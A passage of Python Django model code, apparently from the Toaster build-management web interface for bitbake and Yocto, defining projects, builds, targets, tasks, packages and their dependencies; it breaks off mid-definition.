    def get_is_new(self):
        """Return the project-specific 'is new' flag variable."""
        return self.get_variable(Project.PROJECT_SPECIFIC_ISNEW)

    def get_available_machines(self):
        """ Returns QuerySet of all Machines which are provided by the
        Layers currently added to the Project """
        queryset = Machine.objects.filter(
            layer_version__in=self.get_project_layer_versions())

        return queryset

    def get_all_compatible_machines(self):
        """ Returns QuerySet of all the compatible machines available to the
        project including ones from Layers not currently added """
        queryset = Machine.objects.filter(
            layer_version__in=self.get_all_compatible_layer_versions())

        return queryset

    def get_available_distros(self):
        """ Returns QuerySet of all Distros which are provided by the
        Layers currently added to the Project """
        queryset = Distro.objects.filter(
            layer_version__in=self.get_project_layer_versions())

        return queryset

    def get_all_compatible_distros(self):
        """ Returns QuerySet of all the compatible Wind River distros available to the
        project including ones from Layers not currently added """
        queryset = Distro.objects.filter(
            layer_version__in=self.get_all_compatible_layer_versions())

        return queryset

    def get_available_recipes(self):
        """ Returns QuerySet of all the recipes that are provided by layers
        added to this project """
        queryset = Recipe.objects.filter(
            layer_version__in=self.get_project_layer_versions())

        return queryset

    def get_all_compatible_recipes(self):
        """ Returns QuerySet of all the compatible Recipes available to the
        project including ones from Layers not currently added """
        queryset = Recipe.objects.filter(
            layer_version__in=self.get_all_compatible_layer_versions()).exclude(name__exact='')

        return queryset

    # Project Specific status management
    PROJECT_SPECIFIC_STATUS = 'INTERNAL_PROJECT_SPECIFIC_STATUS'
    PROJECT_SPECIFIC_CALLBACK = 'INTERNAL_PROJECT_SPECIFIC_CALLBACK'
    PROJECT_SPECIFIC_ISNEW = 'INTERNAL_PROJECT_SPECIFIC_ISNEW'
    PROJECT_SPECIFIC_DEFAULTIMAGE = 'PROJECT_SPECIFIC_DEFAULTIMAGE'
    PROJECT_SPECIFIC_NONE = ''
    PROJECT_SPECIFIC_NEW = '1'
    PROJECT_SPECIFIC_EDIT = '2'
    PROJECT_SPECIFIC_CLONING = '3'
    PROJECT_SPECIFIC_CLONING_SUCCESS = '4'
    PROJECT_SPECIFIC_CLONING_FAIL = '5'

    def get_variable(self,variable,default_value = ''):
        """Return the named project variable's value, or default_value."""
        try:
            return self.projectvariable_set.get(name=variable).value
        except (ProjectVariable.DoesNotExist,IndexError):
            return default_value

    def set_variable(self,variable,value):
        """Create or update the named project variable."""
        pv,create = ProjectVariable.objects.get_or_create(project = self, name = variable)
        pv.value = value
        pv.save()

    def get_default_image(self):
        """Return the project-specific default image variable."""
        return self.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE)

    def schedule_build(self):
        """Queue a build of this project's targets: create the Build plus a
        BuildRequest snapshotting bitbake, targets, layers and variables,
        then signal the build runner.  Returns the BuildRequest."""
        from bldcontrol.models import BuildRequest, BRTarget, BRLayer
        from bldcontrol.models import BRBitbake, BRVariable

        try:
            now = timezone.now()
            build = Build.objects.create(project=self,
                                         completed_on=now,
                                         started_on=now)

            br = BuildRequest.objects.create(project=self,
                                             state=BuildRequest.REQ_QUEUED,
                                             build=build)
            BRBitbake.objects.create(req=br,
                                     giturl=self.bitbake_version.giturl,
                                     commit=self.bitbake_version.branch,
                                     dirpath=self.bitbake_version.dirpath)

            for t in self.projecttarget_set.all():
                BRTarget.objects.create(req=br, target=t.target, task=t.task)
                Target.objects.create(build=br.build, target=t.target,
                                      task=t.task)
                # If we're about to build a custom image recipe make sure
                # that layer is currently in the project before we create the
                # BRLayer objects
                customrecipe = CustomImageRecipe.objects.filter(
                    name=t.target,
                    project=self).first()
                if customrecipe:
                    ProjectLayer.objects.get_or_create(
                        project=self,
                        layercommit=customrecipe.layer_version,
                        optional=False)

            for l in self.projectlayer_set.all().order_by("pk"):
                commit = l.layercommit.get_vcs_reference()
                logger.debug("Adding layer to build %s" %
                             l.layercommit.layer.name)
                BRLayer.objects.create(
                    req=br,
                    name=l.layercommit.layer.name,
                    giturl=l.layercommit.layer.vcs_url,
                    commit=commit,
                    dirpath=l.layercommit.dirpath,
                    layer_version=l.layercommit,
                    local_source_dir=l.layercommit.layer.local_source_dir
                )

            for v in self.projectvariable_set.all():
                BRVariable.objects.create(req=br, name=v.name, value=v.value)

            try:
                br.build.machine = self.projectvariable_set.get(
                    name='MACHINE').value
                br.build.save()
            except ProjectVariable.DoesNotExist:
                pass
            br.save()
            signal_runbuilds()

        except Exception:
            # revert the build request creation since we're not done cleanly
            br.delete()
            raise
        return br
class Build(models.Model):
    """One bitbake build run for a Project, with its outcome, progress
    counters and relations to targets, tasks, variables and log messages."""
    SUCCEEDED = 0
    FAILED = 1
    IN_PROGRESS = 2
    CANCELLED = 3

    BUILD_OUTCOME = (
        (SUCCEEDED, 'Succeeded'),
        (FAILED, 'Failed'),
        (IN_PROGRESS, 'In Progress'),
        (CANCELLED, 'Cancelled'),
    )

    search_allowed_fields = ['machine', 'cooker_log_path', "target__target", "target__target_image_file__file_name"]

    project = models.ForeignKey(Project)            # must have a project
    machine = models.CharField(max_length=100)
    distro = models.CharField(max_length=100)
    distro_version = models.CharField(max_length=100)
    started_on = models.DateTimeField()
    completed_on = models.DateTimeField()
    outcome = models.IntegerField(choices=BUILD_OUTCOME, default=IN_PROGRESS)
    cooker_log_path = models.CharField(max_length=500)
    build_name = models.CharField(max_length=100, default='')
    bitbake_version = models.CharField(max_length=50)

    # number of recipes to parse for this build
    recipes_to_parse = models.IntegerField(default=1)

    # number of recipes parsed so far for this build
    recipes_parsed = models.IntegerField(default=1)

    # number of repos to clone for this build
    repos_to_clone = models.IntegerField(default=1)

    # number of repos cloned so far for this build (default off)
    repos_cloned = models.IntegerField(default=1)

    # Hint on current progress item
    progress_item = models.CharField(max_length=40)

    @staticmethod
    def get_recent(project=None):
        """
        Return recent builds as a list; if project is set, only return
        builds for that project
        """

        builds = Build.objects.all()

        if project:
            builds = builds.filter(project=project)

        finished_criteria = \
            Q(outcome=Build.SUCCEEDED) | \
            Q(outcome=Build.FAILED) | \
            Q(outcome=Build.CANCELLED)

        recent_builds = list(itertools.chain(
            builds.filter(outcome=Build.IN_PROGRESS).order_by("-started_on"),
            builds.filter(finished_criteria).order_by("-completed_on")[:3]
        ))

        # add percentage done property to each build; this is used
        # to show build progress in mrb_section.html
        for build in recent_builds:
            build.percentDone = build.completeper()
            build.outcomeText = build.get_outcome_text()

        return recent_builds

    def started(self):
        """
        As build variables are only added for a build when its BuildStarted event
        is received, a build with no build variables is counted as
        "in preparation" and not properly started yet. This method
        will return False if a build has no build variables (it never properly
        started), or True otherwise.

        Note that this is a temporary workaround for the fact that we don't
        have a fine-grained state variable on a build which would allow us
        to record "in progress" (BuildStarted received) vs. "in preparation".
        """
        variables = Variable.objects.filter(build=self)
        return len(variables) > 0

    def completeper(self):
        """Return build completion percentage (tasks with an outcome vs.
        all tasks), as an integer 0-100."""
        tf = Task.objects.filter(build = self)
        tfc = tf.count()
        if tfc > 0:
            completeper = tf.exclude(outcome=Task.OUTCOME_NA).count()*100 // tfc
        else:
            completeper = 0
        return completeper

    def eta(self):
        """Estimate the completion time by linear extrapolation from the
        percentage of tasks done so far."""
        eta = timezone.now()
        completeper = self.completeper()
        if self.completeper() > 0:
            eta += ((eta - self.started_on)*(100-completeper))/completeper
        return eta

    def has_images(self):
        """
        Returns True if at least one of the targets for this build has an
        image file associated with it, False otherwise
        """
        targets = Target.objects.filter(build_id=self.id)
        has_images = False
        for target in targets:
            if target.has_images():
                has_images = True
                break
        return has_images

    def has_image_recipes(self):
        """
        Returns True if a build has any targets which were built from
        image recipes.
        """
        image_recipes = self.get_image_recipes()
        return len(image_recipes) > 0

    def get_image_file_extensions(self):
        """
        Get string of file name extensions for images produced by this build;
        note that this is the actual list of extensions stored on Target objects
        for this build, and not the value of IMAGE_FSTYPES.

        Returns comma-separated string, e.g. "vmdk, ext4"
        """
        extensions = []

        targets = Target.objects.filter(build_id = self.id)
        for target in targets:
            if not target.is_image:
                continue

            target_image_files = Target_Image_File.objects.filter(
                target_id=target.id)

            for target_image_file in target_image_files:
                extensions.append(target_image_file.suffix)

        extensions = list(set(extensions))
        extensions.sort()

        return ', '.join(extensions)

    def get_image_fstypes(self):
        """
        Get the IMAGE_FSTYPES variable value for this build as a de-duplicated
        list of image file suffixes.
        """
        image_fstypes = Variable.objects.get(
            build=self, variable_name='IMAGE_FSTYPES').variable_value
        return list(set(re.split(r' {1,}', image_fstypes)))

    def get_sorted_target_list(self):
        """Return this build's targets ordered by target name."""
        tgts = Target.objects.filter(build_id = self.id).order_by( 'target' );
        return( tgts );

    def get_recipes(self):
        """
        Get the recipes related to this build;
        note that the related layer versions and layers are also prefetched
        by this query, as this queryset can be sorted by these objects in the
        build recipes view; prefetching them here removes the need
        for another query in that view
        """
        layer_versions = Layer_Version.objects.filter(build=self)
        criteria = Q(layer_version__id__in=layer_versions)
        return Recipe.objects.filter(criteria) \
                             .select_related('layer_version', 'layer_version__layer')

    def get_image_recipes(self):
        """
        Returns a list of image Recipes (custom and built-in) related to this
        build, sorted by name; note that this has to be done in two steps, as
        there's no way to get all the custom image recipes and image recipes
        in one query
        """
        custom_image_recipes = self.get_custom_image_recipes()
        custom_image_recipe_names = custom_image_recipes.values_list('name', flat=True)

        not_custom_image_recipes = ~Q(name__in=custom_image_recipe_names) & \
                                   Q(is_image=True)

        built_image_recipes = self.get_recipes().filter(not_custom_image_recipes)

        # append to the custom image recipes and sort
        customisable_image_recipes = list(
            itertools.chain(custom_image_recipes, built_image_recipes)
        )

        return sorted(customisable_image_recipes, key=lambda recipe: recipe.name)

    def get_custom_image_recipes(self):
        """
        Returns a queryset of CustomImageRecipes related to this build,
        sorted by name
        """
        built_recipe_names = self.get_recipes().values_list('name', flat=True)
        criteria = Q(name__in=built_recipe_names) & Q(project=self.project)
        queryset = CustomImageRecipe.objects.filter(criteria).order_by('name')
        return queryset

    def get_outcome_text(self):
        """Return the human-readable label for this build's outcome."""
        return Build.BUILD_OUTCOME[int(self.outcome)][1]

    @property
    def failed_tasks(self):
        """ Get failed tasks for the build """
        tasks = self.task_build.all()
        return tasks.filter(order__gt=0, outcome=Task.OUTCOME_FAILED)

    @property
    def errors(self):
        # Errors include EXCEPTION and CRITICAL level log messages.
        return (self.logmessage_set.filter(level=LogMessage.ERROR) |
                self.logmessage_set.filter(level=LogMessage.EXCEPTION) |
                self.logmessage_set.filter(level=LogMessage.CRITICAL))

    @property
    def warnings(self):
        return self.logmessage_set.filter(level=LogMessage.WARNING)

    @property
    def timespent(self):
        # Wall-clock duration as a timedelta.
        return self.completed_on - self.started_on

    @property
    def timespent_seconds(self):
        return self.timespent.total_seconds()

    @property
    def target_labels(self):
        """
        Sorted (a-z) "target1:task, target2, target3" etc. string for all
        targets in this build
        """
        targets = self.target_set.all()
        target_labels = [target.target +
                         (':' + target.task if target.task else '')
                         for target in targets]
        target_labels.sort()

        return target_labels

    def get_buildrequest(self):
        """Return the associated BuildRequest, or None if there is none."""
        buildrequest = None
        if hasattr(self, 'buildrequest'):
            buildrequest = self.buildrequest
        return buildrequest

    def is_queued(self):
        """True while the build request is still waiting in the queue."""
        from bldcontrol.models import BuildRequest
        buildrequest = self.get_buildrequest()
        if buildrequest:
            return buildrequest.state == BuildRequest.REQ_QUEUED
        else:
            return False

    def is_cancelling(self):
        """True while an in-progress build is being cancelled."""
        from bldcontrol.models import BuildRequest
        buildrequest = self.get_buildrequest()
        if buildrequest:
            return self.outcome == Build.IN_PROGRESS and \
                buildrequest.state == BuildRequest.REQ_CANCELLING
        else:
            return False

    def is_cloning(self):
        """
        True if the build is still cloning repos
        """
        return self.outcome == Build.IN_PROGRESS and \
            self.repos_cloned < self.repos_to_clone

    def is_parsing(self):
        """
        True if the build is still parsing recipes
        """
        return self.outcome == Build.IN_PROGRESS and \
            self.recipes_parsed < self.recipes_to_parse

    def is_starting(self):
        """
        True if the build has no completed tasks yet and is still just starting
        tasks.

        Note that the mechanism for testing whether a Task is "done" is whether
        its outcome field is set, as per the completeper() method.
        """
        return self.outcome == Build.IN_PROGRESS and \
            self.task_build.exclude(outcome=Task.OUTCOME_NA).count() == 0

    def get_state(self):
        """
        Get the state of the build; one of 'Succeeded', 'Failed', 'In Progress',
        'Cancelled' (Build outcomes); or 'Queued', 'Cancelling' (states
        dependent on the BuildRequest state).

        This works around the fact that we have BuildRequest states as well
        as Build states, but really we just want to know the state of the build.
        """
        if self.is_cancelling():
            return 'Cancelling';
        elif self.is_queued():
            return 'Queued'
        elif self.is_cloning():
            return 'Cloning'
        elif self.is_parsing():
            return 'Parsing'
        elif self.is_starting():
            return 'Starting'
        else:
            return self.get_outcome_text()

    def __str__(self):
        return "%d %s %s" % (self.id, self.project, ",".join([t.target for t in self.target_set.all()]))
class ProjectTarget(models.Model):
    """A build target (recipe name plus optional task) configured on a
    Project; copied into Target/BRTarget rows when a build is scheduled."""
    project = models.ForeignKey(Project)
    target = models.CharField(max_length=100)
    task = models.CharField(max_length=100, null=True)
class Target(models.Model):
    """
    A target requested of a Build (e.g. an image or recipe name), together
    with metadata about the artifacts it produced (image files, kernel
    files, SDK files, license/package manifests).
    """
    search_allowed_fields = ['target', 'file_name']
    build = models.ForeignKey(Build)
    target = models.CharField(max_length=100)
    task = models.CharField(max_length=100, null=True)
    is_image = models.BooleanField(default = False)
    image_size = models.IntegerField(default=0)
    license_manifest_path = models.CharField(max_length=500, null=True)
    package_manifest_path = models.CharField(max_length=500, null=True)

    def package_count(self):
        """Return the number of packages installed in this target."""
        return Target_Installed_Package.objects.filter(target_id__exact=self.id).count()

    def __unicode__(self):
        return self.target

    def get_similar_targets(self):
        """
        Get targets for the same machine, task and target name
        (e.g. 'core-image-minimal') from a successful build for this project
        (but excluding this target).

        Note that we only look for targets built by this project because
        projects can have different configurations from each other, and put
        their artifacts in different directories.

        The possibility of error when retrieving candidate targets
        is minimised by the fact that bitbake will rebuild artifacts if MACHINE
        (or various other variables) change. In this case, there is no need to
        clone artifacts from another target, as those artifacts will have
        been re-generated for this target anyway.
        """
        query = ~Q(pk=self.pk) & \
            Q(target=self.target) & \
            Q(build__machine=self.build.machine) & \
            Q(build__outcome=Build.SUCCEEDED) & \
            Q(build__project=self.build.project)

        return Target.objects.filter(query)

    def get_similar_target_with_image_files(self):
        """
        Get the most recent similar target with Target_Image_Files associated
        with it, for the purpose of cloning those files onto this target.
        """
        similar_target = None

        candidates = self.get_similar_targets()
        if candidates.count() == 0:
            return similar_target

        task_subquery = Q(task=self.task)

        # we can look for a 'build' task if this task is a 'populate_sdk_ext'
        # task, as the latter also creates images; and vice versa; note that
        # 'build' targets can have their task set to '';
        # also note that 'populate_sdk' does not produce image files
        image_tasks = [
            '', # aka 'build'
            'build',
            'image',
            'populate_sdk_ext'
        ]
        if self.task in image_tasks:
            task_subquery = Q(task__in=image_tasks)

        # annotate with the count of files, to exclude any targets which
        # don't have associated files
        candidates = candidates.annotate(num_files=Count('target_image_file'))

        query = task_subquery & Q(num_files__gt=0)

        candidates = candidates.filter(query)

        if candidates.count() > 0:
            # order_by() returns a *new* queryset, so the result must be
            # reassigned; without the reassignment, last() would not pick
            # the most recently completed build
            candidates = candidates.order_by('build__completed_on')
            similar_target = candidates.last()

        return similar_target

    def get_similar_target_with_sdk_files(self):
        """
        Get the most recent similar target with TargetSDKFiles associated
        with it, for the purpose of cloning those files onto this target.
        """
        similar_target = None

        candidates = self.get_similar_targets()
        if candidates.count() == 0:
            return similar_target

        # annotate with the count of files, to exclude any targets which
        # don't have associated files
        candidates = candidates.annotate(num_files=Count('targetsdkfile'))

        query = Q(task=self.task) & Q(num_files__gt=0)

        candidates = candidates.filter(query)

        if candidates.count() > 0:
            # see get_similar_target_with_image_files(): order_by() must be
            # reassigned for the ordering to take effect before last()
            candidates = candidates.order_by('build__completed_on')
            similar_target = candidates.last()

        return similar_target

    def clone_image_artifacts_from(self, target):
        """
        Make clones of the Target_Image_Files and TargetKernelFile objects
        associated with Target target, then associate them with this target.

        Note that for Target_Image_Files, we only want files from the previous
        build whose suffix matches one of the suffixes defined in this
        target's build's IMAGE_FSTYPES configuration variable. This prevents the
        Target_Image_File object for an ext4 image being associated with a
        target for a project which didn't produce an ext4 image (for example).

        Also sets the license_manifest_path and package_manifest_path
        of this target to the same path as that of target being cloned from, as
        the manifests are also build artifacts but are treated differently.
        """
        image_fstypes = self.build.get_image_fstypes()

        # filter out any image files whose suffixes aren't in the
        # IMAGE_FSTYPES suffixes variable for this target's build
        image_files = [target_image_file \
            for target_image_file in target.target_image_file_set.all() \
            if target_image_file.suffix in image_fstypes]

        for image_file in image_files:
            # setting pk to None makes save() INSERT a fresh row (a clone)
            image_file.pk = None
            image_file.target = self
            image_file.save()

        kernel_files = target.targetkernelfile_set.all()
        for kernel_file in kernel_files:
            kernel_file.pk = None
            kernel_file.target = self
            kernel_file.save()

        self.license_manifest_path = target.license_manifest_path
        self.package_manifest_path = target.package_manifest_path
        self.save()

    def clone_sdk_artifacts_from(self, target):
        """
        Clone TargetSDKFile objects from target and associate them with this
        target.
        """
        sdk_files = target.targetsdkfile_set.all()
        for sdk_file in sdk_files:
            # setting pk to None makes save() INSERT a fresh row (a clone)
            sdk_file.pk = None
            sdk_file.target = self
            sdk_file.save()

    def has_images(self):
        """
        Returns True if this target has one or more image files attached to it.
        """
        return self.target_image_file_set.all().count() > 0
# kernel artifacts for a target: bzImage and modules*
class TargetKernelFile(models.Model):
    """A kernel build artifact (e.g. bzImage, modules tarball) for a Target."""
    target = models.ForeignKey(Target)
    file_name = models.FilePathField()
    file_size = models.IntegerField()  # in bytes

    @property
    def basename(self):
        """File name with its directory path stripped."""
        return os.path.basename(self.file_name)
# SDK artifacts for a target: sh and manifest files
class TargetSDKFile(models.Model):
    """An SDK build artifact (installer .sh / manifest file) for a Target."""
    target = models.ForeignKey(Target)
    file_name = models.FilePathField()
    file_size = models.IntegerField()  # in bytes

    @property
    def basename(self):
        """File name with its directory path stripped."""
        return os.path.basename(self.file_name)
class Target_Image_File(models.Model):
    """An image file (e.g. rootfs archive) produced by a build for a Target."""

    # valid suffixes for image files produced by a build
    SUFFIXES = {
        'btrfs', 'container', 'cpio', 'cpio.gz', 'cpio.lz4', 'cpio.lzma',
        'cpio.xz', 'cramfs', 'ext2', 'ext2.bz2', 'ext2.gz', 'ext2.lzma',
        'ext3', 'ext3.gz', 'ext4', 'ext4.gz', 'f2fs', 'hddimg', 'iso', 'jffs2',
        'jffs2.sum', 'multiubi', 'squashfs', 'squashfs-lz4', 'squashfs-lzo',
        'squashfs-xz', 'tar', 'tar.bz2', 'tar.gz', 'tar.lz4', 'tar.xz', 'ubi',
        'ubifs', 'wic', 'wic.bz2', 'wic.gz', 'wic.lzma'
    }

    target = models.ForeignKey(Target)
    file_name = models.FilePathField(max_length=254)
    file_size = models.IntegerField()  # in bytes

    @property
    def suffix(self):
        """
        Suffix for image file, minus leading "."
        """
        # check longer suffixes first so that e.g. "multiubi" beats "ubi";
        # iterating the raw set would make the winner for overlapping
        # suffixes depend on hash-seeded set ordering (nondeterministic
        # across interpreter runs)
        for suffix in sorted(Target_Image_File.SUFFIXES, key=len, reverse=True):
            if self.file_name.endswith(suffix):
                return suffix

        # unknown type: fall back to the file's last dotted extension
        filename, suffix = os.path.splitext(self.file_name)
        suffix = suffix.lstrip('.')
        return suffix
class Target_File(models.Model):
    """
    A filesystem entry (file, directory, symlink, device node, ...) in the
    image produced for a Target.
    """
    # inode types, mirroring the POSIX file type taxonomy
    ITYPE_REGULAR = 1
    ITYPE_DIRECTORY = 2
    ITYPE_SYMLINK = 3
    ITYPE_SOCKET = 4
    ITYPE_FIFO = 5
    ITYPE_CHARACTER = 6
    ITYPE_BLOCK = 7
    ITYPES = ( (ITYPE_REGULAR ,'regular'),
        ( ITYPE_DIRECTORY ,'directory'),
        ( ITYPE_SYMLINK ,'symlink'),
        ( ITYPE_SOCKET ,'socket'),
        ( ITYPE_FIFO ,'fifo'),
        ( ITYPE_CHARACTER ,'character'),
        ( ITYPE_BLOCK ,'block'),
    )

    target = models.ForeignKey(Target)
    path = models.FilePathField()
    size = models.IntegerField()  # in bytes
    inodetype = models.IntegerField(choices = ITYPES)
    permission = models.CharField(max_length=16)  # e.g. "rwxr-xr-x" style string
    owner = models.CharField(max_length=128)
    group = models.CharField(max_length=128)
    # containing directory entry, if any (None for the filesystem root)
    directory = models.ForeignKey('Target_File', related_name="directory_set", null=True)
    # entry a symlink points at; only set for ITYPE_SYMLINK rows
    sym_target = models.ForeignKey('Target_File', related_name="symlink_set", null=True)
class Task(models.Model):
    """
    A single bitbake task run (or covered/restored) during a Build, with its
    outcome, sstate result, timings and resource usage.
    """
    # shared state (sstate) cache restore results
    SSTATE_NA = 0
    SSTATE_MISS = 1
    SSTATE_FAILED = 2
    SSTATE_RESTORED = 3

    SSTATE_RESULT = (
        (SSTATE_NA, 'Not Applicable'), # For rest of tasks, but they still need checking.
        (SSTATE_MISS, 'File not in cache'), # the sstate object was not found
        (SSTATE_FAILED, 'Failed'), # there was a pkg, but the script failed
        (SSTATE_RESTORED, 'Succeeded'), # successfully restored
    )

    # what language the task body is written in
    CODING_NA = 0
    CODING_PYTHON = 2
    CODING_SHELL = 3

    TASK_CODING = (
        (CODING_NA, 'N/A'),
        (CODING_PYTHON, 'Python'),
        (CODING_SHELL, 'Shell'),
    )

    # task outcomes; the numeric values are relied upon by the index
    # arithmetic in get_outcome_text() / get_outcome_help() below
    OUTCOME_NA = -1
    OUTCOME_SUCCESS = 0
    OUTCOME_COVERED = 1
    OUTCOME_CACHED = 2
    OUTCOME_PREBUILT = 3
    OUTCOME_FAILED = 4
    OUTCOME_EMPTY = 5

    TASK_OUTCOME = (
        (OUTCOME_NA, 'Not Available'),
        (OUTCOME_SUCCESS, 'Succeeded'),
        (OUTCOME_COVERED, 'Covered'),
        (OUTCOME_CACHED, 'Cached'),
        (OUTCOME_PREBUILT, 'Prebuilt'),
        (OUTCOME_FAILED, 'Failed'),
        (OUTCOME_EMPTY, 'Empty'),
    )

    TASK_OUTCOME_HELP = (
        (OUTCOME_SUCCESS, 'This task successfully completed'),
        (OUTCOME_COVERED, 'This task did not run because its output is provided by another task'),
        (OUTCOME_CACHED, 'This task restored output from the sstate-cache directory or mirrors'),
        (OUTCOME_PREBUILT, 'This task did not run because its outcome was reused from a previous build'),
        (OUTCOME_FAILED, 'This task did not complete'),
        (OUTCOME_EMPTY, 'This task has no executable content'),
        (OUTCOME_NA, ''),
    )

    search_allowed_fields = [ "recipe__name", "recipe__version", "task_name", "logfile" ]

    def __init__(self, *args, **kwargs):
        """Cache this task's help text up-front so get_description() is DB-free."""
        super(Task, self).__init__(*args, **kwargs)
        try:
            self._helptext = HelpText.objects.get(key=self.task_name, area=HelpText.VARIABLE, build=self.build).text
        except HelpText.DoesNotExist:
            self._helptext = None

    def get_related_setscene(self):
        """Return the executed '<task>_setscene' variant(s) of this task, if any."""
        return Task.objects.filter(task_executed=True, build = self.build, recipe = self.recipe, task_name=self.task_name+"_setscene")

    def get_outcome_text(self):
        # TASK_OUTCOME is ordered by outcome value starting at
        # OUTCOME_NA == -1, so (outcome + 1) is the tuple index
        return Task.TASK_OUTCOME[int(self.outcome) + 1][1]

    def get_outcome_help(self):
        # TASK_OUTCOME_HELP is ordered so that index == outcome value,
        # with OUTCOME_NA (-1) deliberately wrapping to the last entry
        return Task.TASK_OUTCOME_HELP[int(self.outcome)][1]

    def get_sstate_text(self):
        # SSTATE_RESULT is indexed by the sstate_result value itself
        if self.sstate_result==Task.SSTATE_NA:
            return ''
        else:
            return Task.SSTATE_RESULT[int(self.sstate_result)][1]

    def get_executed_display(self):
        """Human-readable form of the task_executed flag."""
        if self.task_executed:
            return "Executed"
        return "Not Executed"

    def get_description(self):
        """Help text cached in __init__, or None if none exists for this task."""
        return self._helptext

    build = models.ForeignKey(Build, related_name='task_build')
    order = models.IntegerField(null=True)
    task_executed = models.BooleanField(default=False) # True means Executed, False means Not/Executed
    outcome = models.IntegerField(choices=TASK_OUTCOME, default=OUTCOME_NA)
    sstate_checksum = models.CharField(max_length=100, blank=True)
    path_to_sstate_obj = models.FilePathField(max_length=500, blank=True)
    recipe = models.ForeignKey('Recipe', related_name='tasks')
    task_name = models.CharField(max_length=100)
    source_url = models.FilePathField(max_length=255, blank=True)
    work_directory = models.FilePathField(max_length=255, blank=True)
    script_type = models.IntegerField(choices=TASK_CODING, default=CODING_NA)
    line_number = models.IntegerField(default=0)

    # start/end times
    started = models.DateTimeField(null=True)
    ended = models.DateTimeField(null=True)

    # in seconds; this is stored to enable sorting
    elapsed_time = models.DecimalField(max_digits=8, decimal_places=2, null=True)

    # in bytes; note that disk_io is stored to enable sorting
    disk_io = models.IntegerField(null=True)
    disk_io_read = models.IntegerField(null=True)
    disk_io_write = models.IntegerField(null=True)

    # in seconds
    cpu_time_user = models.DecimalField(max_digits=8, decimal_places=2, null=True)
    cpu_time_system = models.DecimalField(max_digits=8, decimal_places=2, null=True)

    sstate_result = models.IntegerField(choices=SSTATE_RESULT, default=SSTATE_NA)
    message = models.CharField(max_length=240)
    logfile = models.FilePathField(max_length=255, blank=True)

    outcome_text = property(get_outcome_text)
    sstate_text = property(get_sstate_text)

    def __unicode__(self):
        return "%d(%d) %s:%s" % (self.pk, self.build.pk, self.recipe.name, self.task_name)

    class Meta:
        ordering = ('order', 'recipe' ,)
        unique_together = ('build', 'recipe', 'task_name', )
class Task_Dependency(models.Model):
    """A dependency edge between two Tasks: 'task' depends on 'depends_on'."""
    task = models.ForeignKey(Task, related_name='task_dependencies_task')
    depends_on = models.ForeignKey(Task, related_name='task_dependencies_depends')
class Package(models.Model):
    """A binary package produced by a recipe during a build."""
    search_allowed_fields = ['name', 'version', 'revision', 'recipe__name', 'recipe__version', 'recipe__license', 'recipe__layer_version__layer__name', 'recipe__layer_version__branch', 'recipe__layer_version__commit', 'recipe__layer_version__local_path', 'installed_name']
    build = models.ForeignKey('Build', null=True)
    recipe = models.ForeignKey('Recipe', null=True)
    name = models.CharField(max_length=100)
    installed_name = models.CharField(max_length=100, default='')
    version = models.CharField(max_length=100, blank=True)
    revision = models.CharField(max_length=32, blank=True)
    summary = models.TextField(blank=True)
    description = models.TextField(blank=True)
    size = models.IntegerField(default=0)  # package size, in bytes
    installed_size = models.IntegerField(default=0)  # installed size, in bytes
    section = models.CharField(max_length=80, blank=True)
    license = models.CharField(max_length=80, blank=True)

    @property
    def is_locale_package(self):
        """ Returns True if this package is identifiable as a locale package """
        # substring membership is the idiomatic form of name.find(...) != -1
        return 'locale' in self.name

    @property
    def is_packagegroup(self):
        """ Returns True is this package is identifiable as a packagegroup """
        return 'packagegroup' in self.name
class CustomImagePackage(Package):
    """
    A Package as referenced by CustomImageRecipes, tracking which custom
    image recipes include, exclude or append it.
    """
    # CustomImageRecipe fields to track pacakges appended,
    # included and excluded from a CustomImageRecipe
    recipe_includes = models.ManyToManyField('CustomImageRecipe',
                                             related_name='includes_set')
    recipe_excludes = models.ManyToManyField('CustomImageRecipe',
                                             related_name='excludes_set')
    recipe_appends = models.ManyToManyField('CustomImageRecipe',
                                            related_name='appends_set')
class Package_DependencyManager(models.Manager):
    """Manager for Package_Dependency that hides self-referencing rows."""
    use_for_related_fields = True
    # sentinel value callers pass to for_target_or_none() to mean "the most
    # recent target"; compared by identity below, so callers must pass this
    # exact class attribute, not an equal string
    TARGET_LATEST = "use-latest-target-for-target"

    def get_queryset(self):
        # exclude dependencies of a package on itself
        return super(Package_DependencyManager, self).get_queryset().exclude(package_id = F('depends_on__id'))

    def for_target_or_none(self, target):
        """ filter the dependencies to be displayed by the supplied target
        if no dependences are found for the target then try None as the target
        which will return the dependences calculated without the context of a
        target e.g. non image recipes.

        returns: { size, packages }
        """
        package_dependencies = self.all_depends().order_by('depends_on__name')

        if target is self.TARGET_LATEST:
            installed_deps =\
                    package_dependencies.filter(~Q(target__target=None))
        else:
            installed_deps =\
                    package_dependencies.filter(Q(target__target=target))

        packages_list = None
        total_size = 0

        # If we have installed depdencies for this package and target then use
        # these to display
        if installed_deps.count() > 0:
            packages_list = installed_deps
            total_size = installed_deps.aggregate(
                Sum('depends_on__size'))['depends_on__size__sum']
        else:
            new_list = []
            package_names = []

            # Find dependencies for the package that we know about even if
            # it's not installed on a target e.g. from a non-image recipe
            for p in package_dependencies.filter(Q(target=None)):
                if p.depends_on.name in package_names:
                    continue
                else:
                    package_names.append(p.depends_on.name)
                    new_list.append(p.pk)
                    # while we're here we may as well total up the size to
                    # avoid iterating again
                    total_size += p.depends_on.size

            # We want to return a queryset here for consistency so pick the
            # deps from the new_list
            packages_list = package_dependencies.filter(Q(pk__in=new_list))

        return {'packages': packages_list,
                'size': total_size}

    def all_depends(self):
        """ Returns just the depends packages and not any other dep_type
        Note that this is for any target
        """
        return self.filter(Q(dep_type=Package_Dependency.TYPE_RDEPENDS) |
                           Q(dep_type=Package_Dependency.TYPE_TRDEPENDS))
class Package_Dependency(models.Model):
    """A runtime dependency relation between two Packages."""
    # dependency types, mirroring bitbake's R* variables (RDEPENDS,
    # RRECOMMENDS, ...); the T-prefixed variants are target-scoped
    TYPE_RDEPENDS = 0
    TYPE_TRDEPENDS = 1
    TYPE_RRECOMMENDS = 2
    TYPE_TRECOMMENDS = 3
    TYPE_RSUGGESTS = 4
    TYPE_RPROVIDES = 5
    TYPE_RREPLACES = 6
    TYPE_RCONFLICTS = 7
    ' TODO: bpackage should be changed to remove the DEPENDS_TYPE access '
    DEPENDS_TYPE = (
        (TYPE_RDEPENDS, "depends"),
        (TYPE_TRDEPENDS, "depends"),
        (TYPE_TRECOMMENDS, "recommends"),
        (TYPE_RRECOMMENDS, "recommends"),
        (TYPE_RSUGGESTS, "suggests"),
        (TYPE_RPROVIDES, "provides"),
        (TYPE_RREPLACES, "replaces"),
